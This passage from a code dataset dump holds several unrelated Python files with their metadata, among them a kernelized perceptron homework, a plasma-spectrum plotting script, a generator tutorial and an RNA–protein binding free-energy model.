_is_scientific_dtype(dtype):\n \"\"\"Return true if the data type is \"\"\"\n return issubclass(dtype.type, np.number) or dtype.type == np.bool8\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _propagate_attributes(input, output, unitin, unitout, attrout):\n \"\"\"Copy over attributes from input to output\"\"\"\n\n # if the arguments do not have the same shape, only copy the units\n if input.shape != output.shape:\n try:\n setattr(output, '_unit', input._unit)\n except:\n pass\n try:\n setattr(output, '_derived_units', input._derived_units)\n except:\n pass\n\n elif hasattr(input, '__dict__'):\n\n # copy over input's attributes\n for k, v in input.__dict__.items():\n setattr(output, k, v)\n\n _validate_output_unit(input, output, unitin, unitout)\n\n # copy over operator's attributes\n for k,v in attrout.items():\n setattr(output, k, v)\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _smart_reshape(input, shape):\n curr = input\n shape = flatten_sliced_shape(shape)\n while True:\n if curr.shape == shape:\n return curr\n base = curr.base\n if base is None or base.dtype != input.dtype or \\\n base.__class__ != input.__class__ or base.size != input.size:\n return curr.reshape(shape)\n curr = base\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _validate_input_unit(input, expected):\n if len(expected) == 0 or not hasattr(input, '_unit') or \\\n len(input._unit) == 0:\n return\n for u,v in expected.items():\n if u not in input._unit or input._unit[u] != v:\n unit = Quantity(1, expected).unit\n raise ValidationError(\"The input unit '\" + input.unit + \"' is inco\"\\\n \"mpatible with the required unit '\" + unit + \"'.\")\n\n\n#-------------------------------------------------------------------------------\n\n\ndef _validate_output_unit(input, output, unitin, unitout):\n if not hasattr(output, '_unit'):\n return\n if len(unitout) == 0:\n return\n if len(output._unit) == 0:\n output._unit = unitout\n return\n output._unit = _divide_unit(output._unit, unitin)\n output._unit = _multiply_unit(output._unit, unitout)\n","sub_path":"core/src/acquisitionmodels.py","file_name":"acquisitionmodels.py","file_ext":"py","file_size_in_byte":74418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141389721","text":"from abc import ABCMeta\n\nfrom jsoncfg.value_mappers import require_string, require_integer\n\n\nclass PeekFileConfigPeekServerClientMixin(metaclass=ABCMeta):\n\n ### SERVER SECTION ###\n @property\n def peekServerPort(self):\n with self._cfg as c:\n return c.peekServer.port(8011, require_integer)\n\n\n @property\n def peekServerHost(self):\n with self._cfg as c:\n return c.peekServer.host('127.0.0.1', require_string)\n","sub_path":"peek_platform/file_config/PeekFileConfigPeekServerClientMixin.py","file_name":"PeekFileConfigPeekServerClientMixin.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44071728","text":"import numpy as np\n\nfrom BaseInputProcessor import BaseInputProcessor\nclass GaussianNoiseInputProcessor(BaseInputProcessor):\n def __init__(self, variable, uids, mean, std, start = -1, stop = -1):\n super(GaussianNoiseInputProcessor, self).__init__([(variable,uids)],\n mode=0)\n self.mean = mean\n self.std = std\n self.start = start\n self.stop = stop\n self.var = variable\n self.num = len(uids)\n\n def update_input(self):\n self.variables[self.var]['input'] = self.std*\\\n np.array(np.random.randn(self.num), dtype = self.dtypes[self.var]) + self.mean\n\n def is_input_available(self):\n if self.start>-1. and self.stop>self.start:\n return (self.LPU_obj.time >= self.start and\n self.LPU_obj.time < self.stop)\n else:\n return False\n\n def post_run(self):\n pass\n","sub_path":"neurokernel/LPU/InputProcessors/GaussianNoiseInputProcessor.py","file_name":"GaussianNoiseInputProcessor.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"596402071","text":"from svmutil import *\nimport numpy as np\nimport math\nimport random\nimport matplotlib.pyplot as plt\n\n\nclass KernelizedPerceptron_binary():\n\n\tdef __init__(self, path1, path2):\n\n\t\tself.train_list_letter, self.train_list_word = self.parse(path1)\n\t\tself.test_list_letter, self.test_list_word = self.parse(path2)\n\n\n\t\tself.alpha = np.zeros(len(self.train_list_word), dtype = np.float32)\n\t\tself.bias = 0\n\t\tself.maxiter = 20\n\n\t\tself.mistakes_train = np.zeros(self.maxiter, dtype = np.int32)\n\t\tself.mistakes_test = np.zeros(self.maxiter, dtype = np.int32)\n\n\n\tdef parse(self, file):\n\n\t\t# list of the x's\n\t\tlist_word = []\n\t\t# list of the y's\n\t\tlist_letter = []\n\t\t#holds the whole list\n\t\t#list_main = []\n\n\t\tf = open(file)\t\t#code for parsing\n\n\t\tfor line in f:\n\t\t\t# to remove the blank lines\n\t\t\tif line.strip():\n\t\t\t\tg = line.split(\"\\t\")\n\t\t\t\t#convert each element in the list to a list\n\t\t\t\t#extract the label in each x\n\t\t\t\tletter = g[2]\n\t\t\t\t# map the letter to a number \n\t\t\t\t# a -> 1, b -> 2, c -> 3, ...\n\t\t\t\tletter = ord(letter) - 97\n\t\t\t\t#extract the x for each input data\n\t\t\t\tword = list(g[1][2:])\n\t\t\t\t#word = (map(float, word))\n\t\t\t\tword = [float(w) for w in word]\n\t\t\t\tif letter == 0 or letter == 4 or letter == 8 or letter == 14 or letter == 20:\n\t\t\t\t\tletter = 1\n\t\t\t\telse:\n\t\t\t\t\tletter = -1\n\t\t\t\t# print word\n\t\t\t\t# if validation set is being computed\n\t\t\t\tlist_word.append(word)\n\t\t\t\tlist_letter.append(letter)\n\t\t\t\t#list_main.append(g)\n\t\t\n\t\treturn np.array(list_letter, dtype=int), np.array(list_word, dtype=int) #, list_main\n\n\n\tdef classifier_train (self):\n\n\t\tfor iter in range (self.maxiter):\n\t\t\t# print (iter)\n\t\t\tmistake = 0\n\n\t\t\tfor i in range (len(self.train_list_word)):\n\t\t\t\t# now we have to compute the activation function\n\t\t\t\t# computation of activation function\n\t\t\t\ta = 0\n\t\t\t\tfor j in range (len (self.alpha)):\n\t\t\t\t\ta_ = np.dot(self.train_list_word[j], self.train_list_word[i]) + 1\n\n\t\t\t\t\ta__ = math.pow(a_, 2)\n\n\t\t\t\t\ta += self.alpha[j] * a__ + self.bias\n\n\n\t\t\t\t# condition for the mistake check\n\t\t\t\tif self.train_list_letter[i] * a <= 0:\n\t\t\t\t\t\n\t\t\t\t\tmistake += 1\n\t\t\t\t\t# update the alphas\n\t\t\t\t\tself.alpha[i] += self.train_list_letter[i]\n\t\t\t\t\t# update the bias\n\t\t\t\t\tself.bias += self.train_list_letter[i]\n\n\t\t\tself.mistakes_train[iter] = mistake\n\t\t\t# perform the testing after one iteration of training\n\t\t\tself.mistakes_test[iter] = self.classifier_test()\n\n\t\t\n\t\treturn self.alpha, self.bias\n\n\n\tdef classifier_test(self):\n\t\t# for testing set\n\t\tmistake = 0\n\t\t# print (\"testing\")\n\t\tfor i in range (len(self.test_list_word)):\n\n\t\t\ta =0\n\t\t\tfor j in range (len(self.alpha)):\n\t\t\t\n\t\t\t\ta_ = np.dot(self.train_list_word[j], self.test_list_word[i]) + 1\n\n\t\t\t\ta__ = math.pow(a_, 2)\n\n\t\t\t\ta += self.alpha[j] * a__ + self.bias\n\n\t\t\tif self.test_list_letter[i] * a <= 0:\n\n\t\t\t\tmistake += 1\n\t\treturn mistake\n\n\t\t\t\n\n\ndef main():\n\tpath1 = \"/home/goelshivam12/Desktop/ML_Homework/HW#1/OCRdata/ocr_fold0_sm_train.txt\"\n\tpath2 = \"/home/goelshivam12/Desktop/ML_Homework/HW#1/OCRdata/ocr_fold0_sm_test.txt\"\n\n\tclassifier = KernelizedPerceptron_binary(path1, path2)\n\ta, b = classifier.classifier_train()\n\t# print a\n\tprint (classifier.mistakes_train)\n\tprint (classifier.mistakes_test)\n\tprint (len(classifier.train_list_word))\n\tprint (len(classifier.test_list_word))\n\n\tplt.plot(classifier.mistakes_train)\n\tplt.plot(classifier.mistakes_test)\n\tplt.show()\n\n\t# plots the testing accuracy of the dataset\n\t# plt.plot(accuracy_validation)\n\n\t# plt.xlabel(\"C's\", fontsize = 15)\n\t# plt.ylabel(\" Accuracy\", fontsize = 15)\n\t# plt.title(\"Accuracy Curve (SVM)\", fontsize = 25)\n\t# # plt.ylim([0.1, 0.8])\n\t# plt.grid(True)\n\t# plt.legend(['Training', ' Testing', 'Validation'])\n\t# plt.show() \n\n\n\nif __name__ == '__main__':\n\n\tmain()\n\n\n\t\t# compute the training classifier and each time please test its accuracy on the validation data as well as the test data \n\n\n\n\n","sub_path":"HW#2/code/11483916-GOEL/kernelizedperceptron_bin.py","file_name":"kernelizedperceptron_bin.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191719609","text":"#!/usr/bin/python\n\n# Python script to merge multiple def-files into single def-file\nimport os\nimport sys\n\nif (len(sys.argv) != 3 or sys.argv[1] == '-h'):\n print('Usage:')\n print(' merge_def_files.py merge_list.txt outfile.def')\n sys.exit()\n\ndefFileList = open(sys.argv[1], 'r')\ndefFile = defFileList.readlines()\ndefFilePath = []\nmergedDefFile = sys.argv[2]\n\nfor defFileName in defFile:\n defFilePath.append((defFileName).strip())\n\nwith open(mergedDefFile, 'w') as outFile:\n for defFileName in defFilePath:\n outFile.write('\\n\\n')\n with open(defFileName) as inFile:\n for line in inFile:\n outFile.write(line)\n","sub_path":"DEF-files/SHMS/PRODUCTION/merge_def_files.py","file_name":"merge_def_files.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"316790989","text":"import kawa.spectrum as ksp\nimport kawa.daq as dq\nimport kawa.tools as kt\nimport kawa.myplot as my\nimport matplotlib.pyplot as pl\nimport numpy as np\nimport pandas as pd\nimport os\nmy.defalt()\nfid = dq.pantaADC()\n# --- PATH TO REF AND DATA ---\nhome = os.environ[\"HOME\"]\nrefpath = home + \"/KYTHON/ref/\"\ndatapath = home + \"/mnt/\"\n\ndt = 1e-6\ndef read2d_64(shot,subno,kind = \"Iis\",edge1 = int( 0.24 /dt) ,edge2 = int( 0.54 /dt)):\n fid = dq.pantaADC()\n dagfile = pd.read_csv(refpath + \"64ch.dag\",dtype = str,comment = \"#\")\n dt = 1e-6\n count = -1\n if kind == \"Iis\":\n start = 0\n coef = 1\n elif kind == \"Vf\":\n start = 1\n coef = 20\n for i in range(start,64,2): #i == 0 => ch1 => Iis is odd num. \n count += 1\n if count == 0:\n signal,time = fid.read(shot = shot, subshot = subno ,\n tower = dagfile.loc[i,\"tower\" ].strip(),\n station = dagfile.loc[i,\"station\"].strip(),\n ch = dagfile.loc[i,\"ch\" ].strip(),\n dir=datapath, samplingtime=True,\n start = edge1, end = edge2)\n signal = coef*signal\n ms = np.mean(signal)\n if kind == \"Vf\":\n signal = signal- ms\n elif kind == \"Iis\":\n signal = (signal-ms)/ms\n #signal = signal-np.mean(signal)\n\n #signal = ksg.low_pass(signal,fs = 1e6, fcut =12e3,order = 5)\n\n df = pd.DataFrame(signal)\n else:\n signal = fid.read(shot = shot, subshot = subno ,\n tower = dagfile.loc[i,\"tower\" ].strip(),\n station = dagfile.loc[i,\"station\"].strip(),\n ch = dagfile.loc[i,\"ch\" ].strip(),\n dir=datapath, samplingtime=False,\n start = edge1, end = edge2)\n signal = coef*signal\n ms = np.mean(signal)\n if kind == \"Vf\":\n signal = ( signal- ms )\n elif kind == \"Iis\":\n signal = (signal-ms)/ms\n\n #signal = signal-np.mean(signal)\n #signal = ksg.low_pass(signal,fs = 1e6, fcut =12e3,order = 5)\n df[count] = signal\n phase = np.linspace(0,1,32)\n return phase,time,df\nedge1 = int(0.24/dt)\nedge2 = int(0.54/dt)\n\nshot = \"105394\"\nsub = \"001\"\nphase,time,signals = read2d_64(shot,sub,edge1 = edge1,edge2 = edge2)\nf,m,spec1 = ksp.psd2d(signals,dt = dt,nfft = 1e4)\n\nfig = pl.figure()\nax = fig.add_subplot(111)\ntext = r\"$\\mathsf{ \\frac{\\~{I}_{is}}{ \\langle I_{is} \\rangle }} $\"\nmy.contourf_log(f/1000,m,spec1)\npl.xlim(0,20)\npl.ylim(-5,10)\npl.xlabel(\"Frequency (kHz)\")\npl.ylabel(\"Azimuthal mode number\")\ncbar = pl.colorbar()\ncbar.set_ticks([pow(10,i) for i in range(-12,-2)])\npl.text(0.9, 0.15,r\"$\\mathsf{ \\frac{\\~{I}_{is}}{ \\langle I_{is} \\rangle }} $\", ha='center', va='center', transform=ax.transAxes,\n fontsize = 20,color = \"k\",bbox = {\"facecolor\":\"w\",\"edgecolor\" :\"w\"})\npl.show()","sub_path":"paper/old/psd2d.py","file_name":"psd2d.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35399292","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Time : 2017/10/11 PM8:46\n# @Author : edison\n\n# yield 表达式\n\n# yield from 表达式\n# yeild from语法就是将生成器函数中包括yield语句的部分逻辑封装到一个子生成器函数中。\n# 然后在子生成器函数外面可以做一些其他的业务逻辑。整个生成器函数(包括子生成器函数)对外就是一个生成器函数。\n\n\ndef createGenerator(num):\n mylist = range(num)\n for i in mylist:\n yield i * i\n\n\nmygen = createGenerator(5) # mygen 是一个生成器表达式\n\nfor i in mygen:\n print(\"i is %s\" % i)\n\nmygen2 = createGenerator(2)\n\nprint(next(mygen2))\nprint(next(mygen2))\n\n# yield from sample\n\ndef B():\n i = 1\n while i < 5:\n n = yield i\n if i == 3:\n return 100\n i += 1\ndef A():\n val = yield from B()\n print('val is %s' % val)\n\nt = A()\nt.send(None) # means t.next()\n# next()和send()在一定意义上作用是相似的,区别是send()可以传递值给yield表达式,而next()不能传递特定的值,只能传递None进去。因此,我们可以看做\n# t.next() 和 t.send(None) 作用是一样的。\n\nj = 0\nwhile j < 3:\n j += 1\n try:\n t.send(j)\n except StopIteration as e:\n print(e)\n","sub_path":"asyc/lesson01.py","file_name":"lesson01.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"244631393","text":"# Import modules\nimport scipy\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os\nimport ipdb\nimport itertools\n\nkb = 0.0019872041 # kcal/(mol deg K)\nkelvin = 273.15 # Kelvin at 0 deg C\n\ndef load_params(model_param_basename='annotations/RNAmap/qMotif_20180302_'):\n \"\"\"Load the model parameters based on the basename\"\"\"\n base_params = pd.read_csv(model_param_basename + 'term1.csv', index_col=0) #.stack().values\n flip_params = pd.read_csv(model_param_basename + 'term2_single.csv', index_col=0) #.stack().values\n dflip_params = pd.read_csv(model_param_basename + 'term2_double.csv', index_col=0, squeeze=True) #.stack().values, 10])\n coupling_params = pd.read_csv(model_param_basename + 'term3.csv', index_col=0, squeeze=True) #.stack().values\n \n return flip_params, base_params, coupling_params, dflip_params\n \n\ndef get_ddG_conversion(temperature):\n return -(temperature+kelvin)*kb\n\ndef perfect_match_ddG_coupling_terms(sequence, base_penalties, coupling_terms, first_coupling, second_coupling):\n # Inputs:\n # first_coupling--set to True if first (7G) coupling should be included if the conditions are met (this is included so that this can be set to false\n # when flips occur in the coupling region, which will likely prevent coupling)\n # second_coupling--set to True if second (7C) coupling should be included if the necessary conditions are met\n # base_penalties--base penalties in partition function space (exp(-ddG_base/kT))\n # coupling_terms--coupling penalties in partition function space (exp(-ddG_base/kT))\n # sequence register that the mutational penalty contribution is being computed for\n # Output: ddG transformed into partition function space for passed sequence\n\n # Initialize to a penalty of 0 kcal: \n ddG = 0\n # Iterate through base penalties\n for i, base in enumerate(sequence):\n if i==8 and sequence[7]!='A':\n # exception at position 8--nothing happens\n continue\n ddG = ddG + base_penalties.loc[i, base]\n\n # Apply coupling corrections\n if first_coupling:\n if ((sequence[4] == 'U' or sequence[4] == 'C') and\n sequence[5] == 'A' and\n sequence[6] == 'G' and\n sequence[7] != 'A'):\n ddG = ddG + coupling_terms.loc['c1']\n if second_coupling:\n if sequence[6] == 'C' and sequence[7] != 'A':\n ddG = ddG + coupling_terms.loc['c2']\n\n return ddG\n\ndef perfect_match_exp_ddG_coupling_terms(sequence, base_penalties_exp, coupling_terms_exp, first_coupling, second_coupling):\n # Inputs:\n # first_coupling--set to True if first (7G) coupling should be included if the conditions are met (this is included so that this can be set to false\n # when flips occur in the coupling region, which will likely prevent coupling)\n # second_coupling--set to True if second (7C) coupling should be included if the necessary conditions are met\n # base_penalties--base penalties in partition function space (exp(-ddG_base/kT))\n # coupling_terms--coupling penalties in partition function space (exp(-ddG_base/kT))\n # sequence register that the mutational penalty contribution is being computed for\n # Output: ddG transformed into partition function space for passed sequence\n\n # Initialize to a penalty of 0 kcal: 10^(0) = 1; initialize to one in partition function space\n ddG = 1\n # Iterate through base penalties\n for i, base in enumerate(sequence):\n if i==8 and sequence[7]!='A':\n # exception at position 8--nothing happens\n continue\n ddG = ddG*base_penalties_exp.loc[i, base]\n\n # Apply coupling corrections\n if first_coupling:\n if ((sequence[4] == 'U' or sequence[4] == 'C') and\n sequence[5] == 'A' and\n sequence[6] == 'G' and\n sequence[7] != 'A'):\n ddG = ddG*coupling_terms_exp.loc['c1']\n if second_coupling:\n if sequence[6] == 'C' and sequence[7] != 'A':\n ddG = ddG*coupling_terms_exp.loc['c2']\n\n return ddG\n\ndef compute_ensemble_ddG_set(single_dG_values, temperature):\n \"\"\"Same as below but better starting with an array. Also assumes inputs are in dG,\n not in 'partition function space'\"\"\"\n ddG_conversion_factor = get_ddG_conversion(temperature)\n return ddG_conversion_factor*np.log(np.exp(single_dG_values/ddG_conversion_factor).sum(axis=1))\n \n\n\ndef compute_ensemble_ddG(single_dG_values, temperature, needs_exponentiating=False):\n # sums the individual contributions ot the partition function to get the compute partition \n # function and then converts that into a ddG for the ensemble\n # Inputs:\n # single_dG_values--a list of the single contributions to the partition function from all possible registers\n # Outputs:\n # final_ddG--final ddG of the ensemble\n ddG_conversion_factor = get_ddG_conversion(temperature)\n\n if needs_exponentiating:\n single_dG_values = np.exp(single_dG_values/ddG_conversion_factor).copy()\n\n # Sum the logged ddG values to compute the partition function \n partition_function = np.sum(single_dG_values)\n\n # Convert the partition function to the ensemble free energy\n \n final_ddG = ddG_conversion_factor*np.log(partition_function)\n\n return final_ddG\n\ndef get_coupling_bool_term1(flip_pos):\n # oonly apply the first coupling term if there is no flip at position 4, 5\n if flip_pos==4 or flip_pos==5:\n return False\n else:\n return True\n \ndef get_coupling_bool_term2(flip_pos):\n # oonly apply the second coupling term if there is no flip at position 5\n if flip_pos==5:\n return False\n else:\n return True\n\ndef get_noflip_registers(sequence, base_penalties, coupling_params):\n \"\"\"for a sequence, find the ddGs for each 1 nt register of the no-flip binding configuration.\"\"\"\n seq_length = 9\n registers = {}\n for i in range(len(sequence)-seq_length+1):\n ddG = perfect_match_ddG_coupling_terms(sequence[i:i+seq_length], base_penalties, coupling_params, True, True)\n registers[('%d:%d'%(i, i+seq_length), '-')] = ddG\n registers = pd.Series(registers)\n return registers\n\ndef get_1flip_registers(sequence, base_penalties, coupling_params, flip_params):\n \"\"\"for a sequence, find the ddGs for each 1 nt register of the 1nt-flip binding configuration.\"\"\"\n possible_flip_positions = flip_params.index.tolist()\n seq_length = 10\n registers = {}\n for i in range(len(sequence)-seq_length+1):\n current_sequence = sequence[i:i+seq_length]\n for flip_pos in possible_flip_positions:\n seq_not_flipped = current_sequence[:flip_pos]+current_sequence[flip_pos+1:]\n flip_base = current_sequence[flip_pos]\n\n dG = (flip_params.loc[flip_pos, flip_base] + # this is the penalty of flipping the residue\n perfect_match_ddG_coupling_terms(seq_not_flipped, base_penalties, coupling_params,\n get_coupling_bool_term1(flip_pos),\n get_coupling_bool_term2(flip_pos)))\n registers[('%d:%d'%(i, i+seq_length), 'pos%d_1nt'%flip_pos)] = dG\n registers = pd.Series(registers)\n return registers\n\ndef get_2flip_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params):\n \"\"\"for a sequence, find the ddGs for each 1 nt register of the 2nt-flip binding configuration.\"\"\"\n # double flips\n possible_flip_positions = flip_params.index.tolist()\n possible_double_flip_pos = double_flip_params.index.tolist()\n seq_length = 11\n registers = {}\n for i in range(len(sequence)-seq_length+1):\n current_sequence = sequence[i:i+seq_length]\n \n # 2x1nt flips\n for flip_pos1, flip_pos2 in itertools.combinations(possible_flip_positions, 2):\n \n # if the two positions are right next to each other, don't include here because these are the same as double flips\n if np.abs(flip_pos1 - flip_pos2) <= 1:\n continue\n \n seq_not_flipped = current_sequence[:flip_pos1]+current_sequence[flip_pos1+1:flip_pos2] + current_sequence[flip_pos2+1:]\n flip_base1 = current_sequence[flip_pos1]\n flip_base2 = current_sequence[flip_pos2]\n\n dG = (flip_params.loc[flip_pos1, flip_base1] + # this is the penalty of flipping the residue 1\n flip_params.loc[flip_pos2, flip_base2] + # this is the penalty of flipping the residue 2\n perfect_match_ddG_coupling_terms(seq_not_flipped, base_penalties, coupling_params,\n get_coupling_bool_term1(flip_pos1) and get_coupling_bool_term1(flip_pos2),\n get_coupling_bool_term2(flip_pos1) and get_coupling_bool_term2(flip_pos2)))\n \n \n registers[('%d:%d'%(i, i+seq_length), 'pos%d_1nt;pos%d_1nt'%(flip_pos1, flip_pos2))] = dG\n\n \n # 1x2nt flips\n for flip_pos in possible_double_flip_pos:\n\n seq_not_flipped = current_sequence[:flip_pos]+current_sequence[flip_pos+2:]\n dG = (double_flip_params.loc[flip_pos] +\n perfect_match_ddG_coupling_terms(seq_not_flipped, base_penalties, coupling_params,\n get_coupling_bool_term1(flip_pos),\n get_coupling_bool_term2(flip_pos)))\n \n registers[('%d:%d'%(i, i+seq_length), 'pos%d_2nt'%(flip_pos))] = dG\n\n registers = pd.Series(registers)\n return registers\n\n\ndef get_start_and_stop(seq_length, interval_length, i):\n \"\"\"Return the stop and start around nt i.\"\"\"\n start = max(i-interval_length+1, 0)\n stop = min(i+1, seq_length - interval_length+1)\n return start, stop\n \ndef find_energy_for_1nt_sequence_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params, temperature):\n \"\"\"Find the ensemble energy for each 1 nt register\"\"\"\n linear_binding_ddGs = get_noflip_registers(sequence, base_penalties, coupling_params)\n oneflip_binding_ddGs = get_1flip_registers(sequence, base_penalties, coupling_params, flip_params)\n twoflip_binding_ddGs = get_2flip_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params)\n seq_length_linear = 9\n seq_length_oneflip = 10\n seq_length_twoflip = 11\n \n ddGs_final = {}\n for i in range(len(sequence)):\n ddGs = {}\n \n # linear binding\n #if seq_length_linear > seq_length_interval:\n # raise ValueError('sequence is too short')\n\n start, stop = get_start_and_stop(len(sequence), seq_length_linear, i)\n for j in range(start, stop):\n key = '%d:%d'%(j, j+seq_length_linear)\n ddGs[key] = linear_binding_ddGs.loc[key]\n \n \n start, stop = get_start_and_stop(len(sequence), seq_length_oneflip, i)\n for j in range(start, stop):\n key = '%d:%d'%(j, j+seq_length_oneflip)\n ddGs[key] = oneflip_binding_ddGs.loc[key]\n \n start, stop = get_start_and_stop(len(sequence), seq_length_twoflip, i)\n for j in range(start, stop):\n key = '%d:%d'%(j, j+seq_length_twoflip)\n ddGs[key] = twoflip_binding_ddGs.loc[key] \n\n try:\n ddGs = pd.concat(ddGs)\n except ValueError:\n ipdb.set_trace()\n # combine into a single ensemble ddG\n ddG = compute_ensemble_ddG(ddGs, temperature, needs_exponentiating=True)\n ddGs_final[i] = ddG\n \n return pd.Series(ddGs_final) \n \n\ndef find_energy_for_11nt_sequence_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params, temperature):\n \"\"\"Find the ensemble energy for each register\"\"\"\n linear_binding_ddGs = get_noflip_registers(sequence, base_penalties, coupling_params)\n oneflip_binding_ddGs = get_1flip_registers(sequence, base_penalties, coupling_params, flip_params)\n twoflip_binding_ddGs = get_2flip_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params)\n \n # each register in twoflip_binding_ddGs corresponds to two in oneflip and 3 in noflip\n seq_length_interval = min(11, len(sequence))\n seq_length_linear = 9\n seq_length_oneflip = 10\n seq_length_twoflip = 11\n ddGs_final = {}\n for i in range(len(sequence)-seq_length_interval+1):\n ddGs = {}\n \n # linear binding\n if seq_length_linear > seq_length_interval:\n raise ValueError('sequence is too short')\n \n for j in range(seq_length_interval-seq_length_linear+1):\n key = '%d:%d'%(i+j, i+j+seq_length_linear)\n ddGs[key] = linear_binding_ddGs.loc[key]\n \n # one flip binding\n if seq_length_oneflip <= seq_length_interval: \n for j in range(seq_length_interval-seq_length_oneflip+1):\n key = '%d:%d'%(i+j, i+j+seq_length_oneflip)\n ddGs[key] = oneflip_binding_ddGs.loc[key]\n \n # two flip binding\n if seq_length_twoflip <= seq_length_interval: \n for j in range(seq_length_interval-seq_length_twoflip+1):\n key = '%d:%d'%(i+j, i+j+seq_length_twoflip)\n ddGs[key] = twoflip_binding_ddGs.loc[key]\n \n ddGs = pd.concat(ddGs)\n # combine into a single ensemble ddG\n ddG = compute_ensemble_ddG(ddGs, temperature, needs_exponentiating=True)\n ddGs_final[int(i+np.floor(seq_length_interval/2.))] = ddG\n \n return pd.Series(ddGs_final)\n\ndef additive_PUF_flip_model(passed_sequence, flip_params, base_penalties, coupling_params, double_flip_params, temperature, return_ensemble=False):\n # Inputs\n # passed sequence--sequence to compute the affinity for\n # flip_params--list of single flip param penalties (listed as 3/4A, 3/4C, 3/4G, 3/4U, 4/5A, ...)\n # base_penalties--list of single mutation penalties (listed as 1A, 1C, 1G, 1U, 2A, ...)\n # double_flip_params--list of double flip penalties (listed as 3 double flip, 4 double flip, ...)\n # coupling_params--list of coupling adjustments(listed as 7G adjustment followed by 7C adjustment)\n # Outputs\n # ddG predicted for the pased sequence in kcal/mol\n\n # Compute conversion factor at given Temperature (-T*k*(factor to convert exp to base 10))\n ddG_conversion_factor = get_ddG_conversion(temperature)\n\n # convert penalties from ddG space to \"partition function\" space (should be ordered A, C, G, T)\n flip_params_exp = np.exp(flip_params/ddG_conversion_factor)\n double_flip_params_exp = np.exp(double_flip_params/ddG_conversion_factor)\n base_penalties_exp = np.exp(base_penalties/ddG_conversion_factor)\n coupling_params_exp = np.exp(coupling_params/ddG_conversion_factor)\n\n possible_flip_positions = flip_params_exp.index.tolist()\n possible_double_flip_pos = double_flip_params_exp.index.tolist()\n \n # Convert sequence to a list for easy indexing\n sequence = list(passed_sequence)\n\n # initialize a list to store affinity for each possible register (note that this will store not true ddG values, but ddG values in \"partition function\" space)\n #length_9_ddGs = get_length9_registers(sequence, base_penalties_exp, coupling_params_exp)\n single_ddG_values = []\n registers = []\n for i in range(len(sequence)-8):\n single_ddG_values.append(perfect_match_exp_ddG_coupling_terms(sequence[i:i+9], base_penalties_exp, coupling_params_exp, True, True))\n registers.append('noflip_%d'%i)\n \n # compute the 1 nt flip ddG values\n for i in range(len(sequence)-9):\n current_sequence = sequence[i:i+10]\n for flip_pos in possible_flip_positions:\n seq_not_flipped = current_sequence[:flip_pos]+current_sequence[flip_pos+1:]\n flip_base = current_sequence[flip_pos]\n\n dG = (flip_params_exp.loc[flip_pos, flip_base]* # this is the penalty of flipping the residue\n perfect_match_exp_ddG_coupling_terms(seq_not_flipped, base_penalties_exp, coupling_params_exp,\n get_coupling_bool_term1(flip_pos),\n get_coupling_bool_term2(flip_pos)))\n single_ddG_values.append(dG)\n registers.append('flip_%d;pos_%d'%(i, flip_pos))\n \n # double flips\n for i in range(len(sequence)-10):\n current_sequence = sequence[i:i+11]\n \n # 2x1nt flips\n for flip_pos1, flip_pos2 in itertools.combinations(possible_flip_positions, 2):\n seq_not_flipped = current_sequence[:flip_pos1]+current_sequence[flip_pos1+1:flip_pos2] + current_sequence[flip_pos2+1:]\n flip_base1 = current_sequence[flip_pos1]\n flip_base2 = current_sequence[flip_pos2]\n\n dG = (flip_params_exp.loc[flip_pos1, flip_base1]* # this is the penalty of flipping the residue 1\n flip_params_exp.loc[flip_pos2, flip_base2]* # this is the penalty of flipping the residue 2\n perfect_match_exp_ddG_coupling_terms(seq_not_flipped, base_penalties_exp, coupling_params_exp,\n get_coupling_bool_term1(flip_pos1) and get_coupling_bool_term1(flip_pos2),\n get_coupling_bool_term2(flip_pos1) and get_coupling_bool_term2(flip_pos2)))\n single_ddG_values.append(dG)\n registers.append('doubleflip_%d;pos_%d;pos_%d'%(i, flip_pos1, flip_pos2))\n \n # 1x2nt flips\n for flip_pos in possible_double_flip_pos:\n\n seq_not_flipped = current_sequence[:flip_pos]+current_sequence[flip_pos+2:]\n dG = (double_flip_params_exp.loc[flip_pos]*\n perfect_match_exp_ddG_coupling_terms(seq_not_flipped, base_penalties_exp, coupling_params_exp,\n get_coupling_bool_term1(flip_pos),\n get_coupling_bool_term2(flip_pos)))\n single_ddG_values.append(dG)\n registers.append('doubleflip_%d;pos_%d'%(i, flip_pos))\n\n ddG = compute_ensemble_ddG(single_ddG_values, temperature)\n \n if return_ensemble:\n return ddG, pd.Series(ddG_conversion_factor*np.log(single_ddG_values), index=registers)\n else:\n return ddG\n\ndef interpret_col_names(col_names):\n \"\"\" given the 'register' annotations above, group them more meaningfully\"\"\"\n annotations = pd.Series(1, index=col_names)\n annotations.loc[[idx for idx in col_names if idx.find('noflip')==0 and idx!='noflip_0']] = 2\n annotations.loc[[idx for idx in col_names if idx.find('flip')==0]] = 4\n annotations.loc[[idx for idx in col_names if idx.find('doubleflip')==0]] = 8\n\n return annotations\n\ndef flag_ensemble(ddG_ensemble_vec, cutoff=1):\n \"\"\"Given a set of measurements, find things within cutoff and generate flag with annotations\"\"\"\n close_enough_vec = [idx for idx, val in ddG_ensemble_vec.iteritems() if val < cutoff]\n annotations = 